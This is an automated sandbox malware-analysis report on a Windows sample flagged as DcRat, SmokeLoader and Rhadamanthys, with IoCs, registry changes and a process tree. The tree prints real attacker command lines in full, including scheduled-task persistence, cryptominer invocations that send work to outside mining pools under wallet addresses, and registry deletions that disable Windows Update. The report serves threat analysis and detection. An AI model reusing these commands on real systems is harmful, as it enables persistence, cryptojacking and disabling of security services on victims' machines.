Analysis
-
max time kernel
84s
-
max time network
152s
-
platform
windows10-2004_x64
-
resource
win10v2004-20230221-en
-
resource tags
arch:x64 arch:x86 image:win10v2004-20230221-en locale:en-us os:windows10-2004-x64 system
-
submitted
25-02-2023 17:13
Static task
static1
Behavioral task
behavioral1
Sample
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
Resource
win10v2004-20230221-en
General
-
Target
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
-
Size
252KB
-
MD5
4c321bea573c9d741d073aee4280af7d
-
SHA1
57f6df6d4b8b0c1e093c96aa88177582cd75b59a
-
SHA256
f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec
-
SHA512
eb06034eda2e0871b66f9f588c1243d52e74d8315a1a4cb245d41868ba2f13d7933a9c0114c635b73a7625c4c4e2e5ce1b9b41affb17a3cae34e7063ecd62aca
-
SSDEEP
3072:hAxkekLAFD6gK/32/dJhN3rvg/7/E8argeVTtXPpxBqRhDmlhHo:KOLTgK/4ogrxPXBq7mL
Malware Config
Signatures
-
DcRat 3 IoCs
DarkCrystal (DC) is a .NET RAT, active since June 2019, that is capable of loading additional plugins.
Processes:
pid process
4672 schtasks.exe
5040 schtasks.exe
description ioc process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
-
Detect rhadamanthys stealer shellcode 4 IoCs
Processes:
resource yara_rule
behavioral1/memory/1396-410-0x00000000021B0000-0x00000000021CC000-memory.dmp family_rhadamanthys
behavioral1/memory/1396-413-0x00000000021B0000-0x00000000021CC000-memory.dmp family_rhadamanthys
behavioral1/memory/1396-414-0x00000000021D0000-0x00000000021EA000-memory.dmp family_rhadamanthys
behavioral1/memory/1396-451-0x00000000021B0000-0x00000000021CC000-memory.dmp family_rhadamanthys
-
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule
behavioral1/memory/2304-134-0x00000000048D0000-0x00000000048D9000-memory.dmp family_smokeloader
-
Modifies security service 2 TTPs 5 IoCs
Processes:
description ioc process
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
description pid process target process
PID 3876 created 3164 3876 tmp40FB.tmpmomuxluwyocb.exe Explorer.EXE
PID 3876 created 3164 3876 tmp40FB.tmpmomuxluwyocb.exe Explorer.EXE
PID 3876 created 3164 3876 tmp40FB.tmpmomuxluwyocb.exe Explorer.EXE
PID 3876 created 3164 3876 tmp40FB.tmpmomuxluwyocb.exe Explorer.EXE
PID 3964 created 3164 3964 WinUpdate.exe Explorer.EXE
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
description ioc process
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 988.exe
-
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
.NET Reactor protector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule
behavioral1/memory/216-175-0x0000000000100000-0x0000000000290000-memory.dmp net_reactor
behavioral1/memory/3744-183-0x0000000000640000-0x0000000000BD2000-memory.dmp net_reactor
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 988.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 988.exe
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description ioc process
Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 988.exe
Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 282.exe
-
Executes dropped EXE 8 IoCs
Processes:
pid process
3948 ED43.exe
1396 F60E.exe
216 282.exe
3744 988.exe
3876 tmp40FB.tmpmomuxluwyocb.exe
4928 tmp40FC.tmptucb6auv258.exe
3964 WinUpdate.exe
4968 Infrastructureprotection.exe
-
Obfuscated with Agile.Net obfuscator 8 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule
behavioral1/memory/3744-189-0x0000000000640000-0x0000000000BD2000-memory.dmp agile_net
C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe agile_net
C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe agile_net
C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe agile_net
behavioral1/memory/4928-479-0x0000000000140000-0x0000000000150000-memory.dmp agile_net
behavioral1/memory/3744-480-0x0000000000640000-0x0000000000BD2000-memory.dmp agile_net
C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe agile_net
C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe agile_net
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule
C:\Users\Admin\AppData\Local\Temp\988.exe themida
C:\Users\Admin\AppData\Local\Temp\988.exe themida
behavioral1/memory/3744-189-0x0000000000640000-0x0000000000BD2000-memory.dmp themida
behavioral1/memory/3744-480-0x0000000000640000-0x0000000000BD2000-memory.dmp themida
-
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description ioc process
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Infrastructure protection v3.39 = "C:\\Users\\Admin\\AppData\\Local\\Infrastructure protection v3.39\\Infrastructureprotection.exe" tmp40FC.tmptucb6auv258.exe
-
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 988.exe
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc
99 ip-api.com
101 icanhazip.com
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
pid process
3744 988.exe
1396 F60E.exe
1396 F60E.exe
1396 F60E.exe
-
Drops file in Program Files directory 1 IoCs
Processes:
description ioc process
File created C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe tmp40FB.tmpmomuxluwyocb.exe
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
pid process
2264 sc.exe
3332 sc.exe
2556 sc.exe
1064 sc.exe
4948 sc.exe
4696 sc.exe
1216 sc.exe
1512 sc.exe
4992 sc.exe
1324 sc.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
pid pid_target process target process
4976 1396 WerFault.exe F60E.exe
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 F60E.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID F60E.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F60E.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F60E.exe
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F60E.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString tmp40FC.tmptucb6auv258.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Infrastructureprotection.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Infrastructureprotection.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 988.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 988.exe
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 988.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 988.exe
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 tmp40FC.tmptucb6auv258.exe
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid process
4672 schtasks.exe
5040 schtasks.exe
-
Delays execution with timeout.exe 1 IoCs
Processes:
pid process
916 timeout.exe
-
Modifies data under HKEY_USERS 46 IoCs
Processes:
description ioc process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid process
2304 f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
2304 f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
3164 Explorer.EXE (repeated for the remaining IoCs)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process
3164 Explorer.EXE
-
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
pid process
2304 f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe
3164 Explorer.EXE (repeated for the remaining IoCs)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description pid process
Token: SeShutdownPrivilege 3164 Explorer.EXE
Token: SeCreatePagefilePrivilege 3164 Explorer.EXE
Token: SeShutdownPrivilege 3164 Explorer.EXE
Token: SeCreatePagefilePrivilege 3164 Explorer.EXE
Token: SeDebugPrivilege 3744 988.exe
Token: SeDebugPrivilege 216 282.exe
Token: SeSecurityPrivilege 4084 msiexec.exe
Token: SeShutdownPrivilege 1396 F60E.exe
Token: SeCreatePagefilePrivilege 1396 F60E.exe
Token: SeShutdownPrivilege 3164 Explorer.EXE
Token: SeCreatePagefilePrivilege 3164 Explorer.EXE
Token: SeShutdownPrivilege 3164 Explorer.EXE
Token: SeCreatePagefilePrivilege 3164 Explorer.EXE
Token: SeShutdownPrivilege 3164 Explorer.EXE
Token: SeCreatePagefilePrivilege 3164 Explorer.EXE
Token: SeShutdownPrivilege 3164 Explorer.EXE
Token: SeCreatePagefilePrivilege 3164 Explorer.EXE
Token: SeDebugPrivilege 4928 tmp40FC.tmptucb6auv258.exe
Token: SeDebugPrivilege 3048 powershell.exe
Token: SeDebugPrivilege 4284 powershell.exe
Token: SeIncreaseQuotaPrivilege 4284 powershell.exe
Token: SeSecurityPrivilege 4284 powershell.exe
Token: SeTakeOwnershipPrivilege 4284 powershell.exe
Token: SeLoadDriverPrivilege 4284 powershell.exe
Token: SeSystemProfilePrivilege 4284 powershell.exe
Token: SeSystemtimePrivilege 4284 powershell.exe
Token: SeProfSingleProcessPrivilege 4284 powershell.exe
Token: SeIncBasePriorityPrivilege 4284 powershell.exe
Token: SeCreatePagefilePrivilege 4284 powershell.exe
Token: SeBackupPrivilege 4284 powershell.exe
Token: SeRestorePrivilege 4284 powershell.exe
Token: SeShutdownPrivilege 4284 powershell.exe
Token: SeDebugPrivilege 4284 powershell.exe
Token: SeSystemEnvironmentPrivilege 4284 powershell.exe
Token: SeRemoteShutdownPrivilege 4284 powershell.exe
Token: SeUndockPrivilege 4284 powershell.exe
Token: SeManageVolumePrivilege 4284 powershell.exe
Token: 33 4284 powershell.exe
Token: 34 4284 powershell.exe
Token: 35 4284 powershell.exe
Token: 36 4284 powershell.exe
Token: SeIncreaseQuotaPrivilege 4284 powershell.exe
Token: SeSecurityPrivilege 4284 powershell.exe
Token: SeTakeOwnershipPrivilege 4284 powershell.exe
Token: SeLoadDriverPrivilege 4284 powershell.exe
Token: SeSystemProfilePrivilege 4284 powershell.exe
Token: SeSystemtimePrivilege 4284 powershell.exe
Token: SeProfSingleProcessPrivilege 4284 powershell.exe
Token: SeIncBasePriorityPrivilege 4284 powershell.exe
Token: SeCreatePagefilePrivilege 4284 powershell.exe
Token: SeBackupPrivilege 4284 powershell.exe
Token: SeRestorePrivilege 4284 powershell.exe
Token: SeShutdownPrivilege 4284 powershell.exe
Token: SeDebugPrivilege 4284 powershell.exe
Token: SeSystemEnvironmentPrivilege 4284 powershell.exe
Token: SeRemoteShutdownPrivilege 4284 powershell.exe
Token: SeUndockPrivilege 4284 powershell.exe
Token: SeManageVolumePrivilege 4284 powershell.exe
Token: 33 4284 powershell.exe
Token: 34 4284 powershell.exe
Token: 35 4284 powershell.exe
Token: 36 4284 powershell.exe
Token: SeIncreaseQuotaPrivilege 4284 powershell.exe
Token: SeSecurityPrivilege 4284 powershell.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description pid process target process
PID 3164 wrote to memory of 3948 3164 Explorer.EXE ED43.exe
PID 3164 wrote to memory of 3948 3164 Explorer.EXE ED43.exe
PID 3164 wrote to memory of 1396 3164 Explorer.EXE F60E.exe
PID 3164 wrote to memory of 1396 3164 Explorer.EXE F60E.exe
PID 3164 wrote to memory of 1396 3164 Explorer.EXE F60E.exe
PID 3164 wrote to memory of 216 3164 Explorer.EXE 282.exe
PID 3164 wrote to memory of 216 3164 Explorer.EXE 282.exe
PID 3164 wrote to memory of 3744 3164 Explorer.EXE 988.exe
PID 3164 wrote to memory of 3744 3164 Explorer.EXE 988.exe
PID 3164 wrote to memory of 3744 3164 Explorer.EXE 988.exe
PID 3164 wrote to memory of 3676 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3676 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3676 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3676 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3408 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3408 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3408 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3972 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3972 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3972 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 3972 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 2568 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 2568 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 2568 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 4984 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 4984 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 4984 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 4984 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 5012 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 5012 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 5012 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 5012 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 1176 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 1176 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 1176 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 1176 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 1680 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 1680 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 1680 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 4584 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 4584 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 4584 3164 Explorer.EXE explorer.exe
PID 3164 wrote to memory of 4584 3164 Explorer.EXE explorer.exe
PID 3744 wrote to memory of 3876 3744 988.exe tmp40FB.tmpmomuxluwyocb.exe
PID 3744 wrote to memory of 3876 3744 988.exe tmp40FB.tmpmomuxluwyocb.exe
PID 3744 wrote to memory of 4928 3744 988.exe tmp40FC.tmptucb6auv258.exe
PID 3744 wrote to memory of 4928 3744 988.exe tmp40FC.tmptucb6auv258.exe
PID 4928 wrote to memory of 4356 4928 tmp40FC.tmptucb6auv258.exe cmd.exe
PID 4928 wrote to memory of 4356 4928 tmp40FC.tmptucb6auv258.exe cmd.exe
PID 4356 wrote to memory of 916 4356 cmd.exe timeout.exe
PID 4356 wrote to memory of 916 4356 cmd.exe timeout.exe
PID 4920 wrote to memory of 4948 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 4948 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 2264 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 2264 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 4696 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 4696 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 1216 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 1216 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 1512 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 1512 4920 cmd.exe sc.exe
PID 4920 wrote to memory of 1704 4920 cmd.exe reg.exe
PID 4920 wrote to memory of 1704 4920 cmd.exe reg.exe
PID 4920 wrote to memory of 1392 4920 cmd.exe reg.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXE (depth 1)
Command line: C:\Windows\Explorer.EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe (depth 2)
Command line: "C:\Users\Admin\AppData\Local\Temp\f255f64aded09b91eed435a1c93100e006d59aa82fdbc931bec2da402d540eec.exe"
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\ED43.exe (depth 2)
Command line: C:\Users\Admin\AppData\Local\Temp\ED43.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F60E.exe (depth 2)
Command line: C:\Users\Admin\AppData\Local\Temp\F60E.exe
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 3)
Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 980
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\282.exe (depth 2)
Command line: C:\Users\Admin\AppData\Local\Temp\282.exe
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (depth 3)
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "URRERK" /tr "C:\ProgramData\AppVirtualBoxHelp\URRERK.exe"
-
C:\Windows\system32\schtasks.exe (depth 4)
Command line: schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "URRERK" /tr "C:\ProgramData\AppVirtualBoxHelp\URRERK.exe"
- DcRat
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe (depth 3)
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a cryptonight-heavy --url=pool.hashvault.pro:80 -u 48KAmnwZUxBRbm4hKTpM1x6ucn4UqmdBwaojP5ka3kVWfpHEXRvLHq1NuE1s4R4yWRS663yNRe2EKZNXk96cJHL51BaXhga -R --variant=-1 --max-cpu-usage=40 --donate-level=1 -opencl --pass neweramining
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe (depth 3)
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.shaxta -p x -t 6
-
C:\Windows\system32\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c cls
-
C:\Users\Admin\AppData\Local\Temp\988.exe (depth 2)
Command line: C:\Users\Admin\AppData\Local\Temp\988.exe
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tmp40FB.tmpmomuxluwyocb.exe (depth 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\tmp40FB.tmpmomuxluwyocb.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe (depth 3)
Command line: "C:\Users\Admin\AppData\Local\Temp\tmp40FC.tmptucb6auv258.exe"
- Executes dropped EXE
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7E86.tmp.bat""
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\timeout.exe (depth 5)
Command line: timeout 4
- Delays execution with timeout.exe
-
C:\Windows\system32\schtasks.exe (depth 5)
Command line: schtasks.exe /create /f /sc MINUTE /mo 5 /tn "Infrastructure protection v3.39" /tr "'C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe"'
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe (depth 5)
Command line: "C:\Users\Admin\AppData\Local\Infrastructure protection v3.39\Infrastructureprotection.exe"
- Executes dropped EXE
- Checks processor information in registry
-
C:\Windows\SysWOW64\explorer.exe (depth 2)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 2)
Command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 2)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 2)
Command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 2)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 2)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 2)
Command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 2)
